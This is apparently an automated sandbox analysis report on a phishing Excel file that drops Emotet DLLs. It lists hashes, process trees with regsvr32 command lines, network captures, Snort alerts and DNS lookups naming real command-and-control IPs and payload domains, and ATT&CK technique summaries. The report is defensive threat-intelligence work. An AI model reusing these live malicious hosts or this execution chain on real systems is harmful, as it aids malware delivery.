SHA-512:	EF4DB4F06EE1F85AB96AA70FC5DD05A062DA6A5D13F9A643AFE471F6FDC9FEA62FF39F3C951286B7A865C66C53E0E73FD84E2E5030E1843F24FE014CE7BA9715
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........?...l...l...l...l...l...l...l../l...l..2l...l.."l...l...l...l...l...l..*l...l..+l...l..,l...lRich...l................PE..d....)mc.........." .................[....................................................@.........................................pg..W....\..d.......T............................................................................ ..8............................text............................... ..`.rdata...G... ...H..................@..@.data..../...p.......N..............@....pdata...............j..............@..@text................................@.. .rsrc...T...........................@..@.reloc..............................@..B................................................................................................................................................................................................................

C:\Users\user\elv3.ooocccxxx

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	433152
Entropy (8bit):	6.773063357716462
Encrypted:	false
SSDEEP:	6144:PZUCuTJlyIOziaTGy+IeIt1xJh5eWhv/w62LcuPv8cD4mRKqdONyAzDxkMwp2/uw:Py7EzZ4+HvY62LxHJ4KTGDlT
MD5:	DD7105E9748A29B5BD61EA57214D57E3
SHA1:	827B323BDA769BA7FB838A231AA4160209266B14
SHA-256:	C987AD0CC79B598BDEE9EC7DA96B07E82A04CADD73CB3CAF85B799731DEEF9A1
SHA-512:	BECA102422697E4CD50B81289BDC5097935F11C0C5ACC86B7A69893FB819A3CD225E4B2594A2BB40163FBD68D7AC281B0FF260F30B55CF188112445EB26986B7
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........?...l...l...l...l...l...l...l../l...l..2l...l.."l...l...l...l...l...l..*l...l..+l...l..,l...lRich...l................PE..d....)mc.........." .................[....................................................@.........................................pg..W....\..d.......T............................................................................ ..8............................text............................... ..`.rdata...G... ...H..................@..@.data..../...p.......N..............@....pdata...............j..............@..@text................................@.. .rsrc...T...........................@..@.reloc..............................@..B................................................................................................................................................................................................................

C:\Windows\System32\GanZhs\FrugrCuQjdEr.dll (copy)

Download File

Process:	C:\Windows\System32\regsvr32.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	433152
Entropy (8bit):	6.773063357716462
Encrypted:	false
SSDEEP:	6144:PZUCuTJlyIOziaTGy+IeIt1xJh5eWhv/w62LcuPv8cD4mRKqdONyAzDxkMwp2/uw:Py7EzZ4+HvY62LxHJ4KTGDlT
MD5:	DD7105E9748A29B5BD61EA57214D57E3
SHA1:	827B323BDA769BA7FB838A231AA4160209266B14
SHA-256:	C987AD0CC79B598BDEE9EC7DA96B07E82A04CADD73CB3CAF85B799731DEEF9A1
SHA-512:	BECA102422697E4CD50B81289BDC5097935F11C0C5ACC86B7A69893FB819A3CD225E4B2594A2BB40163FBD68D7AC281B0FF260F30B55CF188112445EB26986B7
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........?...l...l...l...l...l...l...l../l...l..2l...l.."l...l...l...l...l...l..*l...l..+l...l..,l...lRich...l................PE..d....)mc.........." .................[....................................................@.........................................pg..W....\..d.......T............................................................................ ..8............................text............................... ..`.rdata...G... ...H..................@..@.data..../...p.......N..............@....pdata...............j..............@..@text................................@.. .rsrc...T...........................@..@.reloc..............................@..B................................................................................................................................................................................................................

C:\Windows\System32\XEzXl\JZazaZgAOY.dll (copy)

Download File

Process:	C:\Windows\System32\regsvr32.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	433152
Entropy (8bit):	6.7730613530277655
Encrypted:	false
SSDEEP:	6144:PZUCuTJlyIOziaTGy+IeIt1xJh5eWhv/w62LcuPv8cD4mRKqdONyAzDxkMwp2/uz:Py7EzZ4+HvY62LxHJ4KTGDlT
MD5:	3929B889987F447CB837ED326860AFC6
SHA1:	9BB1A7622F2BC5A6A51487434A77F395DE5E50D7
SHA-256:	B2AA99DEF35F913B42B882122C8DD5F72CEEAB82F6747F1B659C8632CD6EB902
SHA-512:	EF4DB4F06EE1F85AB96AA70FC5DD05A062DA6A5D13F9A643AFE471F6FDC9FEA62FF39F3C951286B7A865C66C53E0E73FD84E2E5030E1843F24FE014CE7BA9715
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........?...l...l...l...l...l...l...l../l...l..2l...l.."l...l...l...l...l...l..*l...l..+l...l..,l...lRich...l................PE..d....)mc.........." .................[....................................................@.........................................pg..W....\..d.......T............................................................................ ..8............................text............................... ..`.rdata...G... ...H..................@..@.data..../...p.......N..............@....pdata...............j..............@..@text................................@.. .rsrc...T...........................@..@.reloc..............................@..B................................................................................................................................................................................................................

Static File Info

General

File type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Author: Gydar, Last Saved By: Gydar, Name of Creating Application: Microsoft Excel, Create Time/Date: Fri Jun 5 19:19:34 2015, Last Saved Time/Date: Thu Nov 10 07:26:07 2022, Security: 0
Entropy (8bit):	5.506793373203057
TrID:	Microsoft Excel sheet (30009/1) 78.94% Generic OLE2 / Multistream Compound File (8008/1) 21.06%
File name:	PO0000001552.xls
File size:	93184
MD5:	ecdc3f1e9afd2ce212a12ba3a844f521
SHA1:	0121ba555dfe0b42834759d201cce505bd619f86
SHA256:	1e494fd9ec670e351dd80258489770ffa43ee6f4be3e14c797f7ce64ae8e9d43
SHA512:	0b3f8566d8e4c49a0698f398e1d1e95ba6f750ccc25f204b1e9526ff6ef6f81e3131f70779ee88365ad65851d21ddeaefd20dab203cdba39b24c1d1a920dec9e
SSDEEP:	1536:vKpb8rGYrMPe3q7Q0XV5xtezEsi8/dgHbCXuZH4gb4CEn9J4ZvX5:vKpb8rGYrMPe3q7Q0XV5xtezEsi8/dgF
TLSH:	3B933A86B2F9D89DEA19C734889B4390A762EC204B564BCB3244F3A67FB0D501F539D7
File Content Preview:	........................>......................................................................................................................................................................................................................................

File Icon


Icon Hash:	74f4e4c2cec4c0d4

Static OLE Info

General

Document Type:	OLE
Number of OLE Files:	1

OLE File "PO0000001552.xls"

Indicators

Has Summary Info:
Application Name:	Microsoft Excel
Encrypted Document:	False
Contains Word Document Stream:	False
Contains Workbook/Book Stream:	True
Contains PowerPoint Document Stream:	False
Contains Visio Document Stream:	False
Contains ObjectPool Stream:	False
Flash Objects Count:	0
Contains VBA Macros:	False

Summary

Code Page:	1251
Author:
Last Saved By:
Create Time:	2015-06-05 18:19:34
Last Saved Time:	2022-11-10 07:26:07
Creating Application:
Security:	0

Document Summary

Document Code Page:	1251
Thumbnail Scaling Desired:	False
Company:
Contains Dirty Links:	False
Shared Document:	False
Changed Hyperlinks:	False
Application Version:	1048576

Streams

Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096

General
Stream Path:	\x5DocumentSummaryInformation
File Type:	data
Stream Size:	4096
Entropy:	0.3985130586395627
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . $ . . . . . . . . . . . P . . . . . . . X . . . . . . . d . . . . . . . l . . . . . . . t . . . . . . . \| . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . S h e e t 2 . . . . . S h e e t 3 . . . . . S h e e t 4 . . . . . S h e e t 5 . . . . . S h e e t 6 . . . . . S h e
Data Raw:	fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 24 01 00 00 09 00 00 00 01 00 00 00 50 00 00 00 0f 00 00 00 58 00 00 00 17 00 00 00 64 00 00 00 0b 00 00 00 6c 00 00 00 10 00 00 00 74 00 00 00 13 00 00 00 7c 00 00 00 16 00 00 00 84 00 00 00 0d 00 00 00 8c 00 00 00 0c 00 00 00 e1 00 00 00

Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096

General
Stream Path:	\x5SummaryInformation
File Type:	data
Stream Size:	4096
Entropy:	0.2784985381370367
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . X . . . . . . . h . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . G y d a r . . . . . . . . . . . G y d a r . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . ? R , . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 a0 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 58 00 00 00 12 00 00 00 68 00 00 00 0c 00 00 00 80 00 00 00 0d 00 00 00 8c 00 00 00 13 00 00 00 98 00 00 00 02 00 00 00 e3 04 00 00 1e 00 00 00 08 00 00 00

Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 82874

General
Stream Path:	Workbook
File Type:	Applesoft BASIC program data, first line number 16
Stream Size:	82874
Entropy:	5.92856896968195
Base64 Encoded:	True
Data ASCII:	. . . . . . . . Z O . . . . . . . . . . . . . . . . . . . . \\ . p . . . . G y d a r B . . . . a . . . . . . . . = . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . . P . 8 . . . . . . . X . @ . . . . . . . . . . " . . . . . . . . . . . . . .
Data Raw:	09 08 10 00 00 06 05 00 5a 4f cd 07 c9 00 02 00 06 08 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 05 00 00 47 79 64 61 72 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
192.168.2.3182.162.143.56497124432404316 11/13/22-19:28:07.391953	TCP	2404316	ET CNC Feodo Tracker Reported CnC Server TCP group 9	49712	443	192.168.2.3	182.162.143.56
192.168.2.345.63.99.234970970802404334 11/13/22-19:27:51.342965	TCP	2404334	ET CNC Feodo Tracker Reported CnC Server TCP group 18	49709	7080	192.168.2.3	45.63.99.23
192.168.2.31.1.1.163177532023883 11/13/22-19:27:02.730666	UDP	2023883	ET DNS Query to a *.top domain - Likely Hostile	63177	53	192.168.2.3	1.1.1.1
192.168.2.3173.255.211.88497054432404314 11/13/22-19:27:33.992872	TCP	2404314	ET CNC Feodo Tracker Reported CnC Server TCP group 8	49705	443	192.168.2.3	173.255.211.88

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 13, 2022 19:26:49.746951103 CET	49697	443	192.168.2.3	175.98.167.165
Nov 13, 2022 19:26:49.746999025 CET	443	49697	175.98.167.165	192.168.2.3
Nov 13, 2022 19:26:49.747102022 CET	49697	443	192.168.2.3	175.98.167.165
Nov 13, 2022 19:26:49.748613119 CET	49697	443	192.168.2.3	175.98.167.165
Nov 13, 2022 19:26:49.748639107 CET	443	49697	175.98.167.165	192.168.2.3
Nov 13, 2022 19:26:50.236835957 CET	443	49697	175.98.167.165	192.168.2.3
Nov 13, 2022 19:26:50.237086058 CET	49697	443	192.168.2.3	175.98.167.165
Nov 13, 2022 19:26:50.285685062 CET	49697	443	192.168.2.3	175.98.167.165
Nov 13, 2022 19:26:50.285739899 CET	443	49697	175.98.167.165	192.168.2.3
Nov 13, 2022 19:26:50.286483049 CET	443	49697	175.98.167.165	192.168.2.3
Nov 13, 2022 19:26:50.286737919 CET	49697	443	192.168.2.3	175.98.167.165
Nov 13, 2022 19:26:50.287277937 CET	49697	443	192.168.2.3	175.98.167.165
Nov 13, 2022 19:26:50.287300110 CET	443	49697	175.98.167.165	192.168.2.3
Nov 13, 2022 19:26:50.694597006 CET	443	49697	175.98.167.165	192.168.2.3
Nov 13, 2022 19:26:50.694730997 CET	443	49697	175.98.167.165	192.168.2.3
Nov 13, 2022 19:26:50.694792032 CET	49697	443	192.168.2.3	175.98.167.165
Nov 13, 2022 19:26:50.694830894 CET	49697	443	192.168.2.3	175.98.167.165
Nov 13, 2022 19:26:50.696415901 CET	49697	443	192.168.2.3	175.98.167.165
Nov 13, 2022 19:26:50.696441889 CET	443	49697	175.98.167.165	192.168.2.3
Nov 13, 2022 19:26:50.696466923 CET	49697	443	192.168.2.3	175.98.167.165
Nov 13, 2022 19:26:50.696533918 CET	49697	443	192.168.2.3	175.98.167.165
Nov 13, 2022 19:26:51.585938931 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:51.794390917 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:51.794640064 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:51.795133114 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:51.994139910 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.000014067 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.000138044 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.000183105 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.000225067 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.000261068 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.000277042 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.000313997 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.000363111 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.000385046 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.000435114 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.000454903 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.000504017 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.000525951 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.000581980 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.000592947 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.000633001 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.000658989 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.000716925 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.000727892 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.000770092 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.194159031 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.194242954 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.194303036 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.194353104 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.194401026 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.194463015 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.194478035 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.194503069 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.194545031 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.194587946 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.194613934 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.194658995 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.194681883 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.194709063 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.194742918 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.194761038 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.194802999 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.194828987 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.194880962 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.194896936 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.194942951 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.194962978 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.195020914 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.195030928 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.195075989 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.195101976 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.195158958 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.195168972 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.195214033 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.195231915 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.195291042 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.195302010 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.195353985 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.195364952 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.195410967 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.195431948 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.195487976 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.385291100 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.385369062 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.385411978 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.385436058 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.385490894 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.385512114 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.385562897 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.385580063 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.385627031 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.385651112 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.385713100 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.385724068 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.385766983 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.385795116 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.385854006 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.385864019 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.385907888 CET	49699	80	192.168.2.3	47.92.35.35

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 13, 2022 19:26:49.247679949 CET	55847	53	192.168.2.3	1.1.1.1
Nov 13, 2022 19:26:49.745223999 CET	53	55847	1.1.1.1	192.168.2.3
Nov 13, 2022 19:26:51.035073042 CET	64213	53	192.168.2.3	1.1.1.1
Nov 13, 2022 19:26:51.582151890 CET	53	64213	1.1.1.1	192.168.2.3
Nov 13, 2022 19:26:57.543345928 CET	52281	53	192.168.2.3	1.1.1.1
Nov 13, 2022 19:26:57.751965046 CET	53	52281	1.1.1.1	192.168.2.3
Nov 13, 2022 19:27:02.730665922 CET	63177	53	192.168.2.3	1.1.1.1
Nov 13, 2022 19:27:03.479362965 CET	53	63177	1.1.1.1	192.168.2.3

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Nov 13, 2022 19:26:49.247679949 CET	192.168.2.3	1.1.1.1	0xa733	Standard query (0)	datie-tw.com	A (IP address)	IN (0x0001)	false
Nov 13, 2022 19:26:51.035073042 CET	192.168.2.3	1.1.1.1	0xa2a2	Standard query (0)	sbm.xinmoshiwang.com	A (IP address)	IN (0x0001)	false
Nov 13, 2022 19:26:57.543345928 CET	192.168.2.3	1.1.1.1	0xa26	Standard query (0)	copunupo.ac.zm	A (IP address)	IN (0x0001)	false
Nov 13, 2022 19:27:02.730665922 CET	192.168.2.3	1.1.1.1	0x5c13	Standard query (0)	ly.yjlianyi.top	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Nov 13, 2022 19:26:49.745223999 CET	1.1.1.1	192.168.2.3	0xa733	No error (0)	datie-tw.com	175.98.167.165	A (IP address)	IN (0x0001)	false
Nov 13, 2022 19:26:51.582151890 CET	1.1.1.1	192.168.2.3	0xa2a2	No error (0)	sbm.xinmoshiwang.com	47.92.35.35	A (IP address)	IN (0x0001)	false
Nov 13, 2022 19:26:57.751965046 CET	1.1.1.1	192.168.2.3	0xa26	No error (0)	copunupo.ac.zm	41.63.0.22	A (IP address)	IN (0x0001)	false
Nov 13, 2022 19:27:03.479362965 CET	1.1.1.1	192.168.2.3	0x5c13	No error (0)	ly.yjlianyi.top	81.68.152.197	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

datie-tw.com

copunupo.ac.zm

182.162.143.56

sbm.xinmoshiwang.com

ly.yjlianyi.top

Target ID:	0
Start time:	19:26:43
Start date:	13/11/2022
Path:	C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
Wow64 process (32bit):	false
Commandline:	C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\user\Desktop\PO0000001552.xls
Imagebase:	0x7ff62cde0000
File size:	64367408 bytes
MD5 hash:	23CAD504B3E04BB54CD636AD2874041A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Analysis Process: regsvr32.exePID: 6588, Parent PID: 4380

General

Target ID:	7
Start time:	19:26:50
Start date:	13/11/2022
Path:	C:\Windows\System32\regsvr32.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\regsvr32.exe /S ..\elv1.ooocccxxx
Imagebase:	0x7ff7208c0000
File size:	24064 bytes
MD5 hash:	578BAB56836A3FE455FFC7883041825B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Analysis Process: regsvr32.exePID: 6608, Parent PID: 4380

General

Target ID:	8
Start time:	19:26:54
Start date:	13/11/2022
Path:	C:\Windows\System32\regsvr32.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\regsvr32.exe /S ..\elv2.ooocccxxx
Imagebase:	0x7ff7208c0000
File size:	24064 bytes
MD5 hash:	578BAB56836A3FE455FFC7883041825B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000008.00000002.1291594477.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Emotet_db7d33fa, Description: unknown, Source: 00000008.00000002.1291594477.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000008.00000002.1290019980.0000000000980000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Emotet_db7d33fa, Description: unknown, Source: 00000008.00000002.1290019980.0000000000980000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
Reputation:	moderate

Analysis Process: regsvr32.exePID: 6676, Parent PID: 6608

General

Target ID:	10
Start time:	19:26:57
Start date:	13/11/2022
Path:	C:\Windows\System32\regsvr32.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\regsvr32.exe "C:\Windows\system32\XEzXl\JZazaZgAOY.dll"
Imagebase:	0x7ff7208c0000
File size:	24064 bytes
MD5 hash:	578BAB56836A3FE455FFC7883041825B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet_3, Description: Yara detected Emotet, Source: 0000000A.00000002.2414500170.0000000000BBB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	moderate

Analysis Process: regsvr32.exePID: 6756, Parent PID: 4380

General

Target ID:	11
Start time:	19:27:00
Start date:	13/11/2022
Path:	C:\Windows\System32\regsvr32.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\regsvr32.exe /S ..\elv3.ooocccxxx
Imagebase:	0x7ff7208c0000
File size:	24064 bytes
MD5 hash:	578BAB56836A3FE455FFC7883041825B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Analysis Process: regsvr32.exePID: 6792, Parent PID: 6756

General

Target ID:	12
Start time:	19:27:03
Start date:	13/11/2022
Path:	C:\Windows\System32\regsvr32.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\regsvr32.exe "C:\Windows\system32\GanZhs\FrugrCuQjdEr.dll"
Imagebase:	0x7ff7208c0000
File size:	24064 bytes
MD5 hash:	578BAB56836A3FE455FFC7883041825B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet_3, Description: Yara detected Emotet, Source: 0000000C.00000002.2414304563.00000000009BB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	moderate

Disassembly

⊘No disassembly

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
